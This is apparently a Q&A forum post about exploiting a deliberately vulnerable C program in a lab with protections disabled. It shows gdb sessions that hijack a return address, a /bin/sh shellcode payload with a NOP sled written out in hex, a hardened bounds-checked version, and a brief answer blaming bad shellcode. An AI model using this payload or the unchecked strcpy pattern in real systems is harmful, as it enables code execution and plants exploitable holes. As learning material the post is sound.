
I've created a small vulnerable C program, which normally won't call function overflowed.

```c
#include <stdio.h>
#include <string.h>

/* Never reached on a normal run; the goal is to redirect control here. */
void overflowed(void)
{
    printf("%s\n", "Hijacked");
}

/* Vulnerable on purpose: strcpy() copies argv[1] into an 80-byte buffer with no length check. */
void normally(char *st)
{
    char buffer[80];
    strcpy(buffer, st);
}

int main(int argc, char *argv[])
{
    normally(argv[1]);
    printf("%s\n", "Regulary executed");
    return 0;
}
```

I opened it up in gdb and managed to call function overflowed:

```
(gdb) disass overflowed
Dump of assembler code for function overflowed:
   0x08048436 : push   %ebp
   0x08048437 : mov    %esp,%ebp
   0x08048439 : push   %ebx
   0x0804843a : call   0x80484bc
   0x0804843f : add    $0x1bc1,%eax
   0x08048444 : lea    -0x1ac0(%eax),%edx
   0x0804844a : push   %edx
   0x0804844b : mov    %eax,%ebx
   0x0804844d : call   0x8048310
   0x08048452 : add    $0x4,%esp
   0x08048455 : nop
   0x08048456 : mov    -0x4(%ebp),%ebx
   0x08048459 : leave
   0x0804845a : ret
End of assembler dump.
(gdb) run $(python -c "print 'A'*88+'\x36\x84\x04\x08'")
Starting program: /root/vuln $(python -c "print 'A'*88+'\x36\x84\x04\x08'")
Hijacked

Program received signal SIGSEGV, Segmentation fault.
0xbffff500 in ?? ()
(gdb)
```

I've set a breakpoint on the exit of function normally to check the stack so I can see which return address to put. I've done that, and here is the output. I just can't figure out why the shellcode won't get executed. Btw, the shellcode works; I already tested it in a C program that invokes this shellcode.

```
(gdb) run $(python -c "print '\x90'*62+'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80'+'\xf4\xf2\xff\xbf'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/vuln $(python -c "print '\x90'*62+'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80'+'\xf4\xf2\xff\xbf'")

Breakpoint 2, normally (st=0xbffff500 "") at vulnerable.c:11
11      }
(gdb) x/25xw $esp
0xbffff2f4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff304:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff314:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff324:     0x90909090      0x90909090      0x90909090      0xc0319090
0xbffff334:     0x2f685099      0x6868732f      0x6e69622f      0x5350e389
0xbffff344:     0xc031e189      0x80cd0bb0      0xbffff2f4      0xbffff500
0xbffff354:     0x00000000
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff345 in ?? ()
(gdb)
```

ASLR is turned off, and the program was compiled with -fno-stack-protector, -z execstack and -no-pie.
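For comparison, a hardened form of the program in the question, as an added example that is not the asker's code: the 80-byte buffer stays, but the unchecked strcpy() is replaced by copy_arg(), which measures the argument first and refuses anything that would not fit, so the saved return address after the buffer can never be overwritten. The names copy_arg, try_len and copies_exactly are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 80

/* Returns 0 and copies st into dst when it fits (NUL included); */
/* returns -1 and leaves dst untouched when it would overflow. */
int copy_arg(const char *st, char *dst, size_t cap)
{
    size_t len = strlen(st);
    if (cap == 0 || len >= cap)  /* need len + 1 bytes, only cap available */
        return -1;
    memcpy(dst, st, len + 1);
    return 0;
}

/* Boundary helper: builds a constructed input of `len` 'A's (the question */
/* used 'A'*88) and reports what copy_arg() decides for it. */
int try_len(size_t len)
{
    char input[256];
    char buffer[BUF_SIZE];
    if (len >= sizeof input)
        return -2;
    memset(input, 'A', len);
    input[len] = '\0';
    return copy_arg(input, buffer, sizeof buffer);
}

/* Checks that an input that fits is copied byte-for-byte. */
int copies_exactly(const char *st)
{
    char buffer[BUF_SIZE];
    return copy_arg(st, buffer, sizeof buffer) == 0 && strcmp(buffer, st) == 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2 || copy_arg(argv[1], buffer, sizeof buffer) != 0) {
        fprintf(stderr, "argument missing or longer than %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", "Regularly executed");
    return 0;
}
```

With this check in place the 88-byte payload from the question is rejected before any byte reaches the stack buffer, which is the property the original strcpy() version lacks.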


1 Answer


The reason why it failed is because of bad shellcode; I took the one from The Shellcoders Handbook and it worked like a charm.
